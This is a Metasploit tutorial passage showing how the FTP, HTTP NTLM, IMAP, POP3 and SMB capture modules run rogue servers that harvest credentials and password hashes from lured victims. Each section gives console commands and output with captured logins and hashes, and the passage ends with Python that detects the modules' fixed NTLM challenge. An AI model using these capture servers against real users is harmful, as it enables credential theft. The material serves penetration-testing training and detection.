FTP
The "ftp" capture module acts as an FTP server in order to capture user credentials.
msf > use auxiliary/server/capture/ftp
msf auxiliary(ftp) > show options
Module options (auxiliary/server/capture/ftp):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  21               yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)

Auxiliary action:

   Name     Description
   ----     -----------
   Capture
The default settings suit our needs, so we simply run the module and entice a user to log in to our server. Once we have captured the information we need, we kill the job the server is running under.
msf auxiliary(ftp) > run
[*] Auxiliary module execution completed
[*] Server started.
msf auxiliary(ftp) >
[*] FTP LOGIN 192.168.1.195:1475 bobsmith / s3cr3t
[*] FTP LOGIN 192.168.1.195:1475 bsmith / s3cr3t
[*] FTP LOGIN 192.168.1.195:1475 bob / s3cr3tp4s
msf auxiliary(ftp) > jobs -l
Jobs
====

  Id  Name
  --  ----
  1   Auxiliary: server/capture/ftp
msf auxiliary(ftp) > kill 1
Stopping job: 1...
[*] Server stopped.
msf auxiliary(ftp) >
http_ntlm
The "http_ntlm" capture module attempts to quietly catch NTLM/LM challenge hashes over HTTP.
msf > use auxiliary/server/capture/http_ntlm
msf auxiliary(http_ntlm) > show options
Module options (auxiliary/server/capture/http_ntlm):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte challenge
   JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format
   SRVHOST     0.0.0.0           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080              yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                       no        The URI to use for this exploit (default is random)

Auxiliary action:

   Name       Description
   ----       -----------
   WebServer
This module has several options available for fine-tuning, including the ability to save any captured hashes in Cain & Abel format. For our setup, we set the LOGFILE value to save the hashes to a text file, set SRVPORT to listen on port 80, and configure URIPATH to / for added realism.
msf auxiliary(http_ntlm) > set LOGFILE captured_hashes.txt
LOGFILE => captured_hashes.txt
msf auxiliary(http_ntlm) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(http_ntlm) > set URIPATH /
URIPATH => /
msf auxiliary(http_ntlm) > run
[*] Auxiliary module execution completed
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.101:80/
[*] Server started.
msf auxiliary(http_ntlm) >
[*] Request '/' from 192.168.1.195:1964
[*] Request '/' from 192.168.1.195:1964
[*] Request '/' from 192.168.1.195:1964
[*] 192.168.1.195: V-MAC-XP\Administrator 397ff8a937165f55fdaaa0bc7130b1a22f85252cc731bb25:af44a1131410665e6dd99eea8f16deb3e81ed4ecc4cb7d2b on V-MAC-XP
msf auxiliary(http_ntlm) > jobs -l
Jobs
====

  Id  Name
  --  ----
  0   Auxiliary: server/capture/http_ntlm
msf auxiliary(http_ntlm) > kill 0
Stopping job: 0...
[*] Server stopped.
msf auxiliary(http_ntlm) >
As shown above, as soon as our victim browses to our server with Internet Explorer, the Administrator hash is collected without any user interaction.
IMAP
The "imap" capture module acts as an IMAP server in order to collect user mail credentials.
msf > use auxiliary/server/capture/imap
msf auxiliary(imap) > show options
Module options (auxiliary/server/capture/imap):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  143              yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)

Auxiliary action:

   Name     Description
   ----     -----------
   Capture
We do not need any additional configuration for this module, so we let it run, then convince a user to connect to our server and collect his credentials.
msf auxiliary(imap) > run
[*] Auxiliary module execution completed
[*] Server started.
msf auxiliary(imap) >
[*] IMAP LOGIN 192.168.1.195:2067 "victim" / "s3cr3t"
msf auxiliary(imap) > jobs -l
Jobs
====

  Id  Name
  --  ----
  0   Auxiliary: server/capture/imap
msf auxiliary(imap) > kill 0
Stopping job: 0...
[*] Server stopped.
msf auxiliary(imap) >
POP3
The "pop3" capture module poses as a POP3 mail server in order to capture user mail credentials.
msf > use auxiliary/server/capture/pop3
msf auxiliary(pop3) > show options
Module options (auxiliary/server/capture/pop3):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  110              yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)

Auxiliary action:

   Name     Description
   ----     -----------
   Capture
We keep the default settings, run the module, then convince the victim to authenticate to our server.
msf auxiliary(pop3) > run
[*] Auxiliary module execution completed
[*] Server started.
msf auxiliary(pop3) >
[*] POP3 LOGIN 192.168.1.195:2084 victim / s3cr3t
msf auxiliary(pop3) > jobs -l
Jobs
====

  Id  Name
  --  ----
  1   Auxiliary: server/capture/pop3
msf auxiliary(pop3) > kill 1
Stopping job: 1...
[*] Server stopped.
msf auxiliary(pop3) >
SMB
The "smb" capture module acts as an SMB share in order to capture user password hashes so that they can be exploited later.
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > show options
Module options (auxiliary/server/capture/smb):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte server challenge
   JOHNPWFILE                    no        The prefix to the local filename to store the hashes in John format
   SRVHOST     0.0.0.0           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     445               yes       The local port to listen on.

Auxiliary action:

   Name     Description
   ----     -----------
   Sniffer
This module has many options available. We only set the JOHNPWFILE option to save the captured hashes in John the Ripper format, run the module, and convince a user to connect to our "share".
msf auxiliary(smb) > set JOHNPWFILE /tmp/smbhashes.txt
JOHNPWFILE => /tmp/smbhashes.txt
msf auxiliary(smb) > run
[*] Auxiliary module execution completed
[*] Server started.
msf auxiliary(smb) >
[*] Mon Mar 28 10:21:56 -0600 2011
NTLMv1 Response Captured from 192.168.1.195:2111
V-MAC-XP\Administrator OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
LMHASH:397ff8a937165f55fdaaa0bc7130b1a22f85252cc731bb25
NTHASH:af44a1131410665e6dd99eea8f16deb3e81ed4ecc4cb7d2b
msf auxiliary(smb) > jobs -l
Jobs
====

  Id  Name
  --  ----
  2   Auxiliary: server/capture/smb
msf auxiliary(smb) > kill 2
Stopping job: 2...
[*] Server stopped.
msf auxiliary(smb) >
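Both the http_ntlm module above and this smb module default their CHALLENGE option to the fixed value 1122334455667788, whereas a genuine server issues a fresh random challenge for every authentication; that constant is the detection handle a defender has. The Python below is an added example, not code from Metasploit or from this page: it parses the NTLMSSP CHALLENGE_MESSAGE (Type 2) that a server returns in a WWW-Authenticate: NTLM header (the same blob is carried inside SMB session setup) and flags the static challenge. The sample headers are constructed inline; the message layout follows MS-NLMP.

```python
import base64
import struct
from typing import Optional

# Fixed 8-byte challenge that the capture/http_ntlm and capture/smb modules
# send by default (their CHALLENGE option). A real server picks a fresh random
# challenge per authentication, so this exact value is a strong rogue-server signal.
STATIC_CAPTURE_CHALLENGE = bytes.fromhex("1122334455667788")
NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
CHALLENGE_MESSAGE = 2  # NTLMSSP MessageType for a Type 2 message


def parse_type2_challenge(msg: bytes) -> Optional[bytes]:
    """Return the ServerChallenge from an NTLMSSP CHALLENGE_MESSAGE, else None.

    Layout (MS-NLMP 2.2.1.2): Signature(8) MessageType(4) TargetNameFields(8)
    NegotiateFlags(4) ServerChallenge(8) Reserved(8) TargetInfoFields(8) ...
    """
    if len(msg) < 32 or msg[:8] != NTLMSSP_SIGNATURE:
        return None
    (msg_type,) = struct.unpack_from("<I", msg, 8)
    if msg_type != CHALLENGE_MESSAGE:
        return None
    return msg[24:32]


def challenge_from_http_header(header_line: str) -> Optional[bytes]:
    """Extract the challenge from a 'WWW-Authenticate: NTLM <base64>' line."""
    name, sep, value = header_line.partition(":")
    if not sep or name.strip().lower() != "www-authenticate":
        return None
    scheme, _, token = value.strip().partition(" ")
    if scheme.upper() != "NTLM" or not token:
        return None  # Basic/Negotiate, or the bare 'NTLM' offer with no blob yet
    try:
        raw = base64.b64decode(token.strip(), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return parse_type2_challenge(raw)


def is_static_capture_challenge(challenge: Optional[bytes]) -> bool:
    return challenge == STATIC_CAPTURE_CHALLENGE


def build_type2_header(challenge: bytes) -> str:
    """Constructed sample input: minimal Type 2 message (empty TargetName and
    TargetInfo, both at offset 48) wrapped the way an HTTP server sends it."""
    empty_fields = struct.pack("<HHI", 0, 0, 48)
    flags = 0x00008201  # NEGOTIATE_UNICODE | NEGOTIATE_NTLM | ALWAYS_SIGN
    msg = (NTLMSSP_SIGNATURE + struct.pack("<I", CHALLENGE_MESSAGE) + empty_fields
           + struct.pack("<I", flags) + challenge + bytes(8) + empty_fields)
    return "WWW-Authenticate: NTLM " + base64.b64encode(msg).decode("ascii")
```

Run challenge_from_http_header over proxy or IDS-extracted response headers (or parse_type2_challenge over the NTLMSSP blob from SMB session setup) and alert when is_static_capture_challenge returns True.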